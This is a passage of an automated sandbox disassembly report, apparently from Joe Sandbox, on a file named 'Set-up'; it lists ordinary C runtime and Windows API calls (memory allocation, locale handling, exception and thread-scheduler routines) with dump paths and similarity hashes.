free.MSVCR100(00000000), ref: 6BB716A5
free.MSVCR100(?,00000000), ref: 6BB716AD
___free_lconv_num.LIBCMT ref: 6BB716BC

Part of subcall function 6BB4767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB476C4
Part of subcall function 6BB4767A: _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6BB476D3
Part of subcall function 6BB4767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB476EC

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: free$InfoLocale_calloc_crt_malloc_crt$DecrementInterlocked___free_lconv_nummalloc
String ID:
API String ID: 2828155784-0
Opcode ID: 873190943ee2585ae4601d6ca53a998c3de765fca4f8e9276c4a0234be9252dd
Instruction ID: 767913e139d1ad399d9fd8f2c096e3189a5603e9748d61dbe5251508eb0f02c1
Opcode Fuzzy Hash: 873190943ee2585ae4601d6ca53a998c3de765fca4f8e9276c4a0234be9252dd
Instruction Fuzzy Hash: 45512872900394AFDB21DF78CC81BAA7BE9FF05740F1448AAE945D7298E778D940D760

Function 6BB57A24 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT(?,?), ref: 6BB57A6D
_getptd.MSVCR100 ref: 6BB57A74
_getptd.MSVCR100 ref: 6BB57A82
_getptd.MSVCR100 ref: 6BB57A90
_getptd.MSVCR100 ref: 6BB57A9B
_getptd.MSVCR100 ref: 6BB57AA6

Strings

csm, xrefs: 6BB57A43

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _getptd$CreateFrameInfo
String ID: csm
API String ID: 4181383844-1018135373
Opcode ID: 8ec51cf5f6161e2fe22f505791f89f019e248bd25405dbe91789e180930a91ee
Instruction ID: 5cad624a19518a3918cddaaed36327d69937cdd52550430b168786a142e52107
Opcode Fuzzy Hash: 8ec51cf5f6161e2fe22f505791f89f019e248bd25405dbe91789e180930a91ee
Instruction Fuzzy Hash: 1011D232A04781DFCA208F76C008B5877A4FF51724F94CAAAD0698B561DB7CE661CB92

Function 6BB402C1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

malloc.MSVCR100(?), ref: 6BB402CC

Part of subcall function 6BB40233: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6BB40CEA,00000001,00000001,00000001,?,6BB4AB90,00000018,6BB4AA18,0000000C,6BB674F7), ref: 6BB40263

_callnewh.MSVCR100(?), ref: 6BB6F2B0
std::exception::exception.LIBCMT(?,00000001), ref: 6BB6F2E7
atexit.MSVCR100(6BBDFC34,?,00000001), ref: 6BB6F2F7
std::exception::exception.LIBCMT(6BBE7580), ref: 6BB6F301
_CxxThrowException.MSVCR100(?,6BB4BDD8,6BBE7580), ref: 6BB6F312
_errno.MSVCR100 ref: 6BB6F321
_errno.MSVCR100 ref: 6BB6F32E

Strings

bad allocation, xrefs: 6BB6F2E0

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errnostd::exception::exception$AllocExceptionHeapThrow_callnewhatexitmalloc
String ID: bad allocation
API String ID: 2638965609-2104205924
Opcode ID: 61ecad3af027f4e49ca6dc539cbd2e69ccd029eefba5d5ea45d781e27ec0ef53
Instruction ID: a5bc277fc61ee4a46ddacf7f439ecc7dc7f3f11016db5f9385b56dfb2234c014
Opcode Fuzzy Hash: 61ecad3af027f4e49ca6dc539cbd2e69ccd029eefba5d5ea45d781e27ec0ef53
Instruction Fuzzy Hash: 7E012235900299AFDF00DBBACC016AD77B8FB40288F5000E4E81097188EF79CA02FF90

Function 6BB5608F Relevance: 15.2, APIs: 10, Instructions: 245COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000009,?,0000006B,00000000,00000000), ref: 6BB5612C
MultiByteToWideChar.KERNEL32(00000000,00000001,?,0000006B,00000000,00000000), ref: 6BB56192
MultiByteToWideChar.KERNEL32(00000000,00000009,6BB56293,00000000,00000000,00000000), ref: 6BB561AB
MultiByteToWideChar.KERNEL32(00000000,00000001,6BB56293,00000000,00000000,00000000), ref: 6BB561FC
CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 6BB56210
_freea_s.MSVCR100(00000000), ref: 6BB5621A
_freea_s.MSVCR100(00000000), ref: 6BB56223

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$_freea_s$CompareString
String ID:
API String ID: 3891795400-0
Opcode ID: f8f3b9feb4bfd7a3e270abd7053ee96c105049b59be2bf000f370d3db48c432d
Instruction ID: 700ba5698e6e6af238ad7e741f15da3434acb501639f637976cbbefddfca50fd
Opcode Fuzzy Hash: f8f3b9feb4bfd7a3e270abd7053ee96c105049b59be2bf000f370d3db48c432d
Instruction Fuzzy Hash: 9681D432A046899FDF215E64CC51BEE7BB2EF45324F140166E932E61A0D73ED860CB52

Function 6BB44F99 Relevance: 15.2, APIs: 10, Instructions: 194COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000100,00000001,00000000,?,?,?,?,?,?,?), ref: 6BB44FE8
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6BB4504B
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 6BB45067
LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 6BB450D1
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6BB450F0
_freea_s.MSVCR100(00000000), ref: 6BB450FA
_freea_s.MSVCR100(?), ref: 6BB45103
malloc.MSVCR100(00000008), ref: 6BB70D21

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$String_freea_s$malloc
String ID:
API String ID: 1406006131-0
Opcode ID: ce98b02d79c8e4109c275b53bf8203bbb27ccb1661bf8cc800f57360bbf54c52
Instruction ID: 3b8baebd2e305a71633d215399b798ff1e5a155739f82a4dd1349e934caf0791
Opcode Fuzzy Hash: ce98b02d79c8e4109c275b53bf8203bbb27ccb1661bf8cc800f57360bbf54c52
Instruction Fuzzy Hash: A751C03290058AFFDF018FA8CC91CAE7BB6FB4A354F504469F62496124D739C960EBA4

Function 6BB50E33 Relevance: 15.1, APIs: 10, Instructions: 124COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000080,00000000,6BBE35D0,00000001,?,?,00000000,?,?,?,?,6BBE35D0,?), ref: 6BB50E8F

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 6ddac8335fbf85078b2eec406133c31f029f9451d161106137467d0242e02436
Instruction ID: 0e8ce19f48f3ba358c3e0714d1f8c9dd69306087babf1eab7ea80dfe4d02a356
Opcode Fuzzy Hash: 6ddac8335fbf85078b2eec406133c31f029f9451d161106137467d0242e02436
Instruction Fuzzy Hash: 2141E6339002E5EFDF10AF68C8D59AD3BB5EF42358B5001A9E5245B290EB399D91CF93

Function 6BB88FD6 Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB88FDD

Part of subcall function 6BB8245A: __EH_prolog3.LIBCMT ref: 6BB82461
Part of subcall function 6BB8245A: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6BB7D96F,00000000,?,00000000,00000000), ref: 6BB8248C
Part of subcall function 6BB8245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6BB824E7
Part of subcall function 6BB8245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6BB824F6
Part of subcall function 6BB8245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6BB82505
Part of subcall function 6BB8245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BB82514
Part of subcall function 6BB8245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BB82523
Part of subcall function 6BB8245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BB82532
Part of subcall function 6BB8245A: GetCurrentThread.KERNEL32 ref: 6BB82550
Part of subcall function 6BB8245A: GetThreadPriority.KERNEL32(00000000), ref: 6BB82557

Part of subcall function 6BB7F2B7: __EH_prolog3.LIBCMT ref: 6BB7F2BE
Part of subcall function 6BB7F2B7: EnterCriticalSection.KERNEL32(6BB7D93F,00000008,6BB89035), ref: 6BB7F2D0
Part of subcall function 6BB7F2B7: ??2@YAPAXI@Z.MSVCR100(00000024), ref: 6BB7F2E2
Part of subcall function 6BB7F2B7: ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6BB7F307
Part of subcall function 6BB7F2B7: LeaveCriticalSection.KERNEL32(?), ref: 6BB7F329

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BB89039
GetLastError.KERNEL32 ref: 6BB89049
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB89061
_CxxThrowException.MSVCR100(?,6BBDFEB4,00000000), ref: 6BB8906F
GetLastError.KERNEL32 ref: 6BB8908C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB890A4
GetLastError.KERNEL32 ref: 6BB890CE
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB890E6
InitializeSListHead.KERNEL32(000000E8), ref: 6BB890FF

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCriticalErrorH_prolog3LastSection$??2@InitializeThread$CountCreateCurrentEnterEventExceptionHeadLeaveListPrioritySpinThrow
String ID:
API String ID: 7361241-0
Opcode ID: a59afacc78a3ddf6ae6c4c281a86d5c32eb5aea77627edd7fd219f36707ee4a8
Instruction ID: b7dd8b935870c415e71c74ff370343e62b216b3458233de79ccaadb95638f53b
Opcode Fuzzy Hash: a59afacc78a3ddf6ae6c4c281a86d5c32eb5aea77627edd7fd219f36707ee4a8
Instruction Fuzzy Hash: 93316C718006869FCB20EFA4CC81BAEB7B8FF05344F108929E46AE7141DB3DE505CB60

Function 6BB81F26 Relevance: 15.1, APIs: 10, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6BB81F2D
??2@YAPAXI@Z.MSVCR100(00000024,0000003C,6BB81F21,?,?,?,?,?,6BB803E2,?,00000000,6BBE4628,0000000C,6BB80342,?,?), ref: 6BB81F36

Part of subcall function 6BB402C1: malloc.MSVCR100(?), ref: 6BB402CC

memcpy.MSVCR100(00000000,6BBE6310,00000024,0000003C,6BB81F21,?,?,?,?,?,6BB803E2,?,00000000,6BBE4628,0000000C,6BB80342), ref: 6BB81F53
std::exception::exception.LIBCMT(?,?,6BBE0034,?,00000002,00000001), ref: 6BB81F86
_CxxThrowException.MSVCR100(?,6BBE0034,?,00000002,00000001), ref: 6BB81F9B
std::exception::exception.LIBCMT(?,6BB73A58,6BBE0018,?), ref: 6BB81FBA
?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001), ref: 6BB81FDD
?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001), ref: 6BB81FE8
Concurrency::unsupported_os::unsupported_os.LIBCMT(00000002,00000001), ref: 6BB81FFE
Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000002,00000001), ref: 6BB8201A

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Policy$Concurrency::unsupported_os::unsupported_osConcurrency@@ElementKey@2@@Policy@SchedulerValue@std::exception::exception$??2@ExceptionH_prolog3_catchThrowmallocmemcpy
String ID:
API String ID: 1209366282-0
Opcode ID: e92db1007ddbfd3c2a6d7ad0acf9a842658936e379e2f374fe7816ffa422ebde
Instruction ID: a975237dcfb3a47944da50dcb965eb90eee85df367dea6227e669a5b8ac5fde1
Opcode Fuzzy Hash: e92db1007ddbfd3c2a6d7ad0acf9a842658936e379e2f374fe7816ffa422ebde
Instruction Fuzzy Hash: 063106719001D8AFCF11EF74D892ADCB7B5FF08398F544021E529AB190DB7CAA06CBA1

Function 6BB5786B Relevance: 15.1, APIs: 10, Instructions: 87COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB5789E
_errno.MSVCR100 ref: 6BB693FC
_invalid_parameter_noinfo.MSVCR100 ref: 6BB69407
_errno.MSVCR100 ref: 6BB69425
_errno.MSVCR100 ref: 6BB69432
_errno.MSVCR100 ref: 6BB6943C
_errno.MSVCR100 ref: 6BB6946C
_errno.MSVCR100 ref: 6BB69476
_errno.MSVCR100 ref: 6BB69489
_invalid_parameter_noinfo.MSVCR100 ref: 6BB69494

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: f55b55062477d9e7a7631590749eab761ac1a6c8460ccf951b297d7023e1ea3c
Instruction ID: 4414819316ba48af6036ad5c2a6394eff25dfea8079fb12a71350dfa55e09f4c
Opcode Fuzzy Hash: f55b55062477d9e7a7631590749eab761ac1a6c8460ccf951b297d7023e1ea3c
Instruction Fuzzy Hash: 9A21D1328046C59E8B316F758881A5E3734FF4A7B8B110294EA648B295EB7C8C11DBA3

Function 6BB57EC4 Relevance: 15.1, APIs: 10, Instructions: 85COMMON

Download Yara Rule

APIs

_lock.MSVCR100(00000008,6BB57F98,00000018,6BB8C0CB,00000001,00000001,00000000,?,6BB8C0FC,000000FF,?,6BB67507,00000011,00000001,?,6BB421A9), ref: 6BB57EE6
DecodePointer.KERNEL32(6BB57F98,00000018,6BB8C0CB,00000001,00000001,00000000,?,6BB8C0FC,000000FF,?,6BB67507,00000011,00000001,?,6BB421A9,0000000D), ref: 6BB57F20
DecodePointer.KERNEL32(?,6BB8C0FC,000000FF,?,6BB67507,00000011,00000001,?,6BB421A9,0000000D), ref: 6BB57F35
_encoded_null.MSVCR100(?,6BB8C0FC,000000FF,?,6BB67507,00000011,00000001,?,6BB421A9,0000000D), ref: 6BB57F4C
DecodePointer.KERNEL32(-00000004,?,6BB8C0FC,000000FF,?,6BB67507,00000011,00000001,?,6BB421A9,0000000D), ref: 6BB57F5B
_encoded_null.MSVCR100(?,6BB8C0FC,000000FF,?,6BB67507,00000011,00000001,?,6BB421A9,0000000D), ref: 6BB57F5F
DecodePointer.KERNEL32(?,6BB8C0FC,000000FF,?,6BB67507,00000011,00000001,?,6BB421A9,0000000D), ref: 6BB57F6E
DecodePointer.KERNEL32(?,6BB8C0FC,000000FF,?,6BB67507,00000011,00000001,?,6BB421A9,0000000D), ref: 6BB57F78

Part of subcall function 6BB57E18: GetModuleHandleW.KERNEL32(00000000,6BB57EDC,6BB57F98,00000018,6BB8C0CB,00000001,00000001,00000000,?,6BB8C0FC,000000FF,?,6BB67507,00000011,00000001), ref: 6BB57E1A

___crtCorExitProcess.LIBCMT ref: 6BB67405

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: DecodePointer$_encoded_null$ExitHandleModuleProcess___crt_lock
String ID:
API String ID: 729311798-0
Opcode ID: f5e1575e61b3fccd9cb7a9a7308d242364eec4dd2c5f3084ba29a6f1017fb361
Instruction ID: b9539e750917b40e8395b43aecf3bcf8700c9522f862abf9e7e7e9519742c25d
Opcode Fuzzy Hash: f5e1575e61b3fccd9cb7a9a7308d242364eec4dd2c5f3084ba29a6f1017fb361
Instruction Fuzzy Hash: 09314A32E043C9DFDF00DFB6C8826ADBBB1BB19355F1080AAD504A3150DBF949A18B62

Function 6BB8ABC4 Relevance: 15.1, APIs: 10, Instructions: 80librarythreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 6BB8ABDB
GetModuleFileNameW.KERNEL32(6BB30000,?,00000104), ref: 6BB8ABF7
LoadLibraryW.KERNEL32(?), ref: 6BB8AC08
GetLastError.KERNEL32 ref: 6BB8AC1F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB8AC3A
_CxxThrowException.MSVCR100(?,6BBDFEB4,00000000), ref: 6BB8AC4B
CreateThread.KERNEL32(00000000,00000000,-00000018,6BB80ED5,00010000,?), ref: 6BB8AC8D
GetLastError.KERNEL32 ref: 6BB8AC97
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB8ACAF
_CxxThrowException.MSVCR100(?,6BBDFEB4,00000000), ref: 6BB8ACBD

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastModuleThrow$CreateFileHandleLibraryLoadNameThread
String ID:
API String ID: 475412-0
Opcode ID: b91081cc7d5fc494c9ce71d471baba861dd12d0ef5cc6176ec14aa2a1a5775f4
Instruction ID: 7c0ed4de9a065f5e21429a21928fc1810d44f599f64ca56957ee4ba41afa01b9
Opcode Fuzzy Hash: b91081cc7d5fc494c9ce71d471baba861dd12d0ef5cc6176ec14aa2a1a5775f4
Instruction Fuzzy Hash: 7A215C31604289AFDF24AFB1DC4ABAE3BA8FF04344F1400A9E516D61A1DBB9DA458F51

Function 6BB42ADB Relevance: 15.1, APIs: 10, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000000,6BBDFC34,00000000,00000000,?,6BB42BAC,?,6BBDFC34,00000000,00000000,?,6BB7061F,00000000,00000010), ref: 6BB42B14
malloc.MSVCR100(6BBDFC34,?,6BB42BAC,?,6BBDFC34,00000000,00000000,?,6BB7061F,00000000,00000010,?,?,?,6BB4AA57,?), ref: 6BB42B90
free.MSVCR100(00000000,00000000,?,6BB42BAC,?,6BBDFC34,00000000,00000000,?,6BB7061F,00000000,00000010,?,?,?,6BB4AA57), ref: 6BB6F367
_callnewh.MSVCR100(6BBDFC34,?,6BB42BAC,?,6BBDFC34,00000000,00000000,?,6BB7061F,00000000,00000010,?,?,?,6BB4AA57,?), ref: 6BB6F383
_callnewh.MSVCR100(6BBDFC34,00000000,00000000,?,6BB42BAC,?,6BBDFC34,00000000,00000000,?,6BB7061F,00000000,00000010), ref: 6BB6F394
_errno.MSVCR100(00000000,00000000,?,6BB42BAC,?,6BBDFC34,00000000,00000000,?,6BB7061F,00000000,00000010,?,?,?,6BB4AA57), ref: 6BB6F39A
_errno.MSVCR100(?,6BB42BAC,?,6BBDFC34,00000000,00000000,?,6BB7061F,00000000,00000010,?,?,?,6BB4AA57,?,6BB4AA70), ref: 6BB6F3AC
GetLastError.KERNEL32(?,6BB42BAC,?,6BBDFC34,00000000,00000000,?,6BB7061F,00000000,00000010,?,?,?,6BB4AA57,?,6BB4AA70), ref: 6BB6F3B3
_errno.MSVCR100(?,6BB42BAC,?,6BBDFC34,00000000,00000000,?,6BB7061F,00000000,00000010,?,?,?,6BB4AA57,?,6BB4AA70), ref: 6BB6F3C4
GetLastError.KERNEL32(?,6BB42BAC,?,6BBDFC34,00000000,00000000,?,6BB7061F,00000000,00000010,?,?,?,6BB4AA57,?,6BB4AA70), ref: 6BB6F3CB

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$ErrorLast_callnewh$AllocHeapfreemalloc
String ID:
API String ID: 2627451454-0
Opcode ID: 3891bba2977952ad085ca3acb26c96550976ba1236d38b7a25483c93e2dab8da
Instruction ID: 9f3819830ef1cad2d71ec9daa20047d31b0c39923dad9b3ee05c646a18701b01
Opcode Fuzzy Hash: 3891bba2977952ad085ca3acb26c96550976ba1236d38b7a25483c93e2dab8da
Instruction Fuzzy Hash: B611E736404792ABCB212F78D805B9D37A8FB467E4B104179E814CB154EB7DC841BBA1

Function 6BB4DEAC Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 171COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 6BB51AE0
atol.MSVCR100(?,?,00000010,00000000,00000000,00000000), ref: 6BB6D66F

Strings

`template-parameter, xrefs: 6BB6D68F, 6BB6D6D2
void, xrefs: 6BB51AD8

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Name::operator=atol
String ID: `template-parameter$void
API String ID: 1388095176-4057429177
Opcode ID: e77ac4bf60f8d214b5e4a49c788d3a3cc18b694e1e03e3d39d062fada8b221de
Instruction ID: 2451807cb0d757e14bf523276207e88bae57461366b21fedcc2e0a8ffd728421
Opcode Fuzzy Hash: e77ac4bf60f8d214b5e4a49c788d3a3cc18b694e1e03e3d39d062fada8b221de
Instruction Fuzzy Hash: 45514971D542889FCF10DFB8E8909EEBBF8FB09344F50406AE515A7254DB399946DB10

Function 6BB85672 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6BB85679
